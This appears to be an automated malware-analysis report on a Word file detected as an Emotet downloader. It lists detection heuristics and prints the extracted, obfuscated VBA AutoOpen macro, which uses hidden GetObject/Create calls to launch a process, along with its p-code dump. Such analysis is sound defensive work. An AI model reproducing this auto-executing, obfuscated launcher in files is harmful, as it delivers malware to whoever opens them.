MALICIOUS
190
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6911245-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6911245-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set QxDxD4 = GetObject(CABcADw.lxcAwA_o.Value + cxxAUB.SXXBxU + CABcADw.lxcAwA_o.Value) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12325 bytes |
SHA-256: 8891af3983240922e47ffbef02c377e6484848fadeca0274af6a1be97d67258b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "JwXoAQ_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "CABcADw"
Attribute VB_Base = "0{2F4A92F4-7920-4395-8121-3819BD775A5F}{DA041100-F338-4CA2-99E9-D1F4C96EAFD2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "cxxAUB"
Attribute VB_Base = "0{9BBEB43E-9D26-4546-A9EA-89765F523487}{2F1B9831-D801-4165-A303-DD05E5AE952A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "jQ1CUA"
Sub autoopen()
On Error Resume Next
Select Case TDcUwB_A
Case 94093231
BAACAC = jkAQ4Q / 316178787 / lA4AG_c - CInt(jQQBxA + CInt(940402362)) + (112466118 * CLng(759412863))
k1UDX1 = 871096539 * TCAZCQAG
SAUGAAA = 850208196 - 102605471 + 279924446 - AAxAAAw / iAAAG41 - Tan(868677367)
End Select
Select Case UABAUAxU
Case 771334385
dAAAAxA = PAZAcxCQ / 87756701 / VDAwQ_Aw - CInt(HxA1AZA + CInt(694492707)) + (289790215 * CLng(907910442))
rADAkA = 383565605 * fAQCwXC
sDUAA14 = 448871441 - 672645496 + 512474701 - pA_DQAkC / rAAQXDA - Tan(106333700)
End Select
Set QxDxD4 = GetObject(CABcADw.lxcAwA_o.Value + cxxAUB.SXXBxU + CABcADw.lxcAwA_o.Value)
Select Case iAZxGGcQ
Case 511402885
zoQA4Q = qDAACCA / 674067476 / H1UcXAD - CInt(rGAAA1 + CInt(641783563)) + (424219774 * CLng(850075319))
IoxABUA = 730308029 * nxAXDU
jDADAA = 769191566 - 61001637 + 225429506 - PQAxZX / NAAcDc - Tan(36609240)
End Select
Select Case w1AAB1
Case 938996945
CCBUAABx = NAoAQU_A / 432186703 / vAUX1AA - CInt(fQAkQDx + CInt(970228400)) + (734741916 * CLng(778866916))
EQAQDcxx = 91218929 * U4k1Xw4
aow_oA = 550767162 - 405975222 + 698993827 - hGAAkCA / Q__B1DZ - Tan(631320408)
End Select
QxDxD4.ShowWindow = 584849 - 584849
Select Case uBXUDC
Case 200802316
pADZ1_B = zQUD1BB / 682685158 / b4QAU4A1 - CInt(BAwAAXAA + CInt(689408129)) + (432751950 * CLng(700658431))
wAcAQ14k = 685405474 * OAxAUA
PAAAAo = 204454242 - 106970279 + 759845641 - nAZUQAAc / zBDAoQkA - Tan(563042852)
End Select
Select Case ooQUB4DU
Case 587639863
LDAwAB_ = Akx14UA / 388821129 / WAUA1DA - CInt(i1DAQ1B + CInt(892449217)) + (302744860 * CLng(561742236))
JwXAGoA = 125265344 * wACAUZ
IxkDwAA_ = 234501768 - 972172313 + 738874835 - rAAAAQ / JD4AUAw - Tan(688759290)
End Select
Select Case SD1xAAQA
Case 180521468
VAAcU1U = hQUAo_QA / 948914106 / dABUAAAx - CInt(u4BAxD + CInt(828975253)) + (241921069 * CLng(191312248))
uA1BCAk = 964555209 * PGwD4BB
dUUQAAA = 912948566 - 884963151 + 84617047 - n_AGQ1 / D4A1U4 - Tan(934729022)
End Select
GetObject(CABcADw.lxcAwA_o.Value + cxxAUB.ioAACAkA + CABcADw.lxcAwA_o.Value) _
.Create CABcADw.lxcAwA_o.Value + cxxAUB.sA_ABCA + CABcADw.lxcAwA_o.Value + cxxAUB.PAccAZA + CABcADw.lxcAwA_o.Value + CABcADw.lxcAwA_o.Value + cxxAUB.DAB4UD4x + CABcADw.lxcAwA_o.Value + CABcADw.lxcAwA_o.Value + cxxAUB.wXBCQQcQ + CABcADw.lxcAwA_o.Value + cxxAUB.WBBkDAD + CABcADw.lxcAwA_o.Value, p11A_AZ, QxDxD4, CABcADw.lxcAwA_o.Value
Select Case WAADADDA
Case 84187356
EUZCAQ = sAA_ZB / 401748745 / wAokAQcD - CInt(YUCAAQ1B + CInt(363931290)) + (607366488 * CLng(610813707))
rcQQUCAA = 497919692 * nBDDQXZ
doQA4A = 934018432 - 192932249 + 976246952 - JxUAAQQ / kAcADGD - Tan(154565724)
End Select
Select Case h_A4DA
Case 602816447
NwQGAB4 = fDZxAAQ / 587414036 / cZACDBD - CInt(dGZ_BkD + CInt(85405195)) + (991209687 * CLng(170160589))
sBA1AGAX = 584870255 * ZX4B_1X
PxCGk4C = 907524586 - 921508450 + 85177870 - i_UCAGx / DxAAcACA - Tan(882699820)
End Select
End Sub
' Processing file: /opt/analyzer/scan_staging/efb8f68a348e49df883b17a6ebd0d773.bin
' ===============================================================================
' Module streams:
' Macros/VBA/JwXoAQ_ - 1105 bytes
' Macros/VBA/CABcADw - 1158 bytes
' Macros/VBA/cxxAUB - 1157 bytes
' Macros/VBA/jQ1CUA - 5459 bytes
' Line #0:
' FuncDefn (Sub jQ1CUA())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' SelectCase
' Line #3:
' LitDI4 0xBFAF 0x059B
' Case
' CaseDone
' Line #4:
' Ld BAACAC
' LitDI4 0x8163 0x12D8
' Div
' Ld jkAQ4Q
' Div
' Ld lA4AG_c
' LitDI4 0x66BA 0x380D
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0x18C6 0x06B4
' LitDI4 0xB87F 0x2D43
' Coerce (Lng)
' Mul
' Paren
' Add
' St TDcUwB_A
' Line #5:
' LitDI4 0xE0DB 0x33EB
' Ld k1UDX1
' Mul
' St jQQBxA
' Line #6:
' LitDI4 0x25C4 0x32AD
' LitDI4 0xA29F 0x061D
' Sub
' LitDI4 0x4EDE 0x10AF
' Add
' Ld SAUGAAA
' Ld AAxAAAw
' Div
' Sub
' LitDI4 0xF6F7 0x33C6
' ArgsLd Tan 0x0001
' Sub
' St TCAZCQAG
' Line #7:
' EndSelect
' Line #8:
' Ld iAAAG41
' SelectCase
' Line #9:
' LitDI4 0xA0F1 0x2DF9
' Case
' CaseDone
' Line #10:
' Ld dAAAAxA
' LitDI4 0x0F9D 0x053B
' Div
' Ld PAZAcxCQ
' Div
' Ld VDAwQ_Aw
' LitDI4 0x1E23 0x2965
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0xD907 0x1145
' LitDI4 0x9D2A 0x361D
' Coerce (Lng)
' Mul
' Paren
' Add
' St UABAUAxU
' Line #11:
' LitDI4 0xBF25 0x16DC
' Ld rADAkA
' Mul
' St HxA1AZA
' Line #12:
' LitDI4 0x3C11 0x1AC1
' LitDI4 0xC178 0x2817
' Sub
' LitDI4 0xBE4D 0x1E8B
' Add
' Ld sDUAA14
' Ld pA_DQAkC
' Div
' Sub
' LitDI4 0x8604 0x0656
' ArgsLd Tan 0x0001
' Sub
' St fAQCwXC
' Line #13:
' EndSelect
' Line #14:
' SetStmt
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Ld MSForms
' MemLd Value
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' ArgsLd QxDxD4 0x0001
' Set rAAQXDA
' Line #15:
' Ld SXXBxU
' SelectCase
' Line #16:
' LitDI4 0x6385 0x1E7B
' Case
' CaseDone
' Line #17:
' Ld zoQA4Q
' LitDI4 0x7414 0x282D
' Div
' Ld qDAACCA
' Div
' Ld H1UcXAD
' LitDI4 0xD70B 0x2640
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0x147E 0x1949
' LitDI4 0x1EB7 0x32AB
' Coerce (Lng)
' Mul
' Paren
' Add
' St iAZxGGcQ
' Line #18:
' LitDI4 0x9DBD 0x2B87
' Ld IoxABUA
' Mul
' St rGAAA1
' Line #19:
' LitDI4 0xEE8E 0x2DD8
' LitDI4 0xCFA5 0x03A2
' Sub
' LitDI4 0xC802 0x0D6F
' Add
' Ld jDADAA
' Ld PQAxZX
' Div
' Sub
' LitDI4 0x9CD8 0x022E
' ArgsLd Tan 0x0001
' Sub
' St nxAXDU
' Line #20:
' EndSelect
' Line #21:
' Ld NAAcDc
' SelectCase
' Line #22:
' LitDI4 0xF4D1 0x37F7
' Case
' CaseDone
' Line #23:
' Ld CCBUAABx
' LitDI4 0xA54F 0x19C2
' Div
' Ld NAoAQU_A
' Div
' Ld vAUX1AA
' LitDI4 0x82B0 0x39D4
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0x459C 0x2BCB
' LitDI4 0x90E4 0x2E6C
' Coerce (Lng)
' Mul
' Paren
' Add
' St w1AAB1
' Line #24:
' LitDI4 0xE3F1 0x056F
' Ld EQAQDcxx
' Mul
' St fQAkQDx
' Line #25:
' LitDI4 0x0A3A 0x20D4
' LitDI4 0xB0B6 0x1832
' Sub
' LitDI4 0xCCA3 0x29A9
' Add
' Ld aow_oA
' Ld hGAAkCA
' Div
' Sub
' LitDI4 0x2F58 0x25A1
' ArgsLd Tan 0x0001
' Sub
' St U4k1Xw4
' Line #26:
' EndSelect
' Line #27:
' LitDI4 0xEC91 0x0008
' LitDI4 0xEC91 0x0008
' Sub
' Ld rAAQXDA
' MemSt Q__B1DZ
' Line #28:
' Ld ShowWindow
' SelectCase
' Line #29:
' LitDI4 0x000C 0x0BF8
' Case
' CaseDone
' Line #30:
' Ld pADZ1_B
' LitDI4 0xF2E6 0x28B0
' Div
' Ld zQUD1BB
' Div
' Ld b4QAU4A1
' LitDI4 0x8881 0x2917
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0x454E 0x19CB
' LitDI4 0x32FF 0x29C3
' Coerce (Lng)
' Mul
' Paren
' Add
' St uBXUDC
' Line #31:
' LitDI4 0x7522 0x28DA
' Ld wAcAQ14k
' Mul
' St BAwAAXAA
' Line #32:
' LitDI4 0xB962 0x0C2F
' LitDI4 0x3CA7 0x0660
' Sub
' LitDI4 0x5309 0x2D4A
' Add
' Ld PAAAAo
' Ld nAZUQAAc
' Div
' Sub
' LitDI4 0x5A24 0x218F
' ArgsLd Tan 0x0001
' Sub
' St OAxAUA
' Line #33:
' EndSelect
' Line #34:
' Ld zBDAoQkA
' SelectCase
' Line #35:
' LitDI4 0xAC37 0x2306
' Case
' CaseDone
' Line #36:
' Ld LDAwAB_
' LitDI4 0xF089 0x172C
' Div
' Ld Akx14UA
' Div
' Ld WAUA1DA
' LitDI4 0xB1C1 0x3531
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0x851C 0x120B
' LitDI4 0x819C 0x217B
' Coerce (Lng)
' Mul
' Paren
' Add
' St ooQUB4DU
' Line #37:
' LitDI4 0x65C0 0x0777
' Ld JwXAGoA
' Mul
' St i1DAQ1B
' Line #38:
' LitDI4 0x3688 0x0DFA
' LitDI4 0x2C19 0x39F2
' Sub
' LitDI4 0x55D3 0x2C0A
' Add
' Ld IxkDwAA_
' Ld rAAAAQ
' Div
' Sub
' LitDI4 0xA1FA 0x290D
' ArgsLd Tan 0x0001
' Sub
' St wACAUZ
' Line #39:
' EndSelect
' Line #40:
' Ld JD4AUAw
' SelectCase
' Line #41:
' LitDI4 0x89FC 0x0AC2
' Case
' CaseDone
' Line #42:
' Ld VAAcU1U
' LitDI4 0x47BA 0x388F
' Div
' Ld hQUAo_QA
' Div
' Ld dABUAAAx
' LitDI4 0x2895 0x3169
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0x6C2D 0x0E6B
' LitDI4 0x3178 0x0B67
' Coerce (Lng)
' Mul
' Paren
' Add
' St SD1xAAQA
' Line #43:
' LitDI4 0xF1C9 0x397D
' Ld uA1BCAk
' Mul
' St u4BAxD
' Line #44:
' LitDI4 0x7D56 0x366A
' LitDI4 0x774F 0x34BF
' Sub
' LitDI4 0x2757 0x050B
' Add
' Ld dUUQAAA
' Ld n_AGQ1
' Div
' Sub
' LitDI4 0xD53E 0x37B6
' ArgsLd Tan 0x0001
' Sub
' St PGwD4BB
' Line #45:
' EndSelect
' Line #46:
' LineCont 0x0004 12 00 00 00
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Ld MSForms
' MemLd Create
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' Ld MSForms
' MemLd sA_ABCA
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' Ld MSForms
' MemLd PAccAZA
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' Ld MSForms
' MemLd DAB4UD4x
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' Ld MSForms
' MemLd wXBCQQcQ
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' Ld WBBkDAD
' Ld rAAQXDA
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Ld MSForms
' MemLd D4A1U4
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' ArgsLd QxDxD4 0x0001
' ArgsMemCall ioAACAkA 0x0004
' Line #47:
' Ld p11A_AZ
' SelectCase
' Line #48:
' LitDI4 0x98DC 0x0504
' Case
' CaseDone
' Line #49:
' Ld EUZCAQ
' LitDI4 0x3309 0x17F2
' Div
' Ld sAA_ZB
' Div
' Ld wAokAQcD
' LitDI4 0x269A 0x15B1
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0xAD58 0x2433
' LitDI4 0x470B 0x2468
' Coerce (Lng)
' Mul
' Paren
' Add
' St WAADADDA
' Line #50:
' LitDI4 0xA6CC 0x1DAD
' Ld rcQQUCAA
' Mul
' St YUCAAQ1B
' Line #51:
' LitDI4 0xFD80 0x37AB
' LitDI4 0xE999 0x0B7F
' Sub
' LitDI4 0x58A8 0x3A30
' Add
' Ld doQA4A
' Ld JxUAAQQ
' Div
' Sub
' LitDI4 0x7C5C 0x0936
' ArgsLd Tan 0x0001
' Sub
' St nBDDQXZ
' Line #52:
' EndSelect
' Line #53:
' Ld kAcADGD
' SelectCase
' Line #54:
' LitDI4 0x3FBF 0x23EE
' Case
' CaseDone
' Line #55:
' Ld NwQGAB4
' LitDI4 0x3A14 0x2303
' Div
' Ld fDZxAAQ
' Div
' Ld cZACDBD
' LitDI4 0x2E0B 0x0517
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0xA8D7 0x3B14
' LitDI4 0x71CD 0x0A24
' Coerce (Lng)
' Mul
' Paren
' Add
' St h_A4DA
' Line #56:
' LitDI4 0x696F 0x22DC
' Ld sBA1AGAX
' Mul
' St dGZ_BkD
' Line #57:
' LitDI4 0xB9EA 0x3617
' LitDI4 0x1A62 0x36ED
' Sub
' LitDI4 0xB60E 0x0513
' Add
' Ld PxCGk4C
' Ld i_UCAGx
' Div
' Sub
' LitDI4 0xEE2C 0x349C
' ArgsLd Tan 0x0001
' Sub
' St ZX4B_1X
' Line #58:
' EndSelect
' Line #59:
' EndSub
' Line #60:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.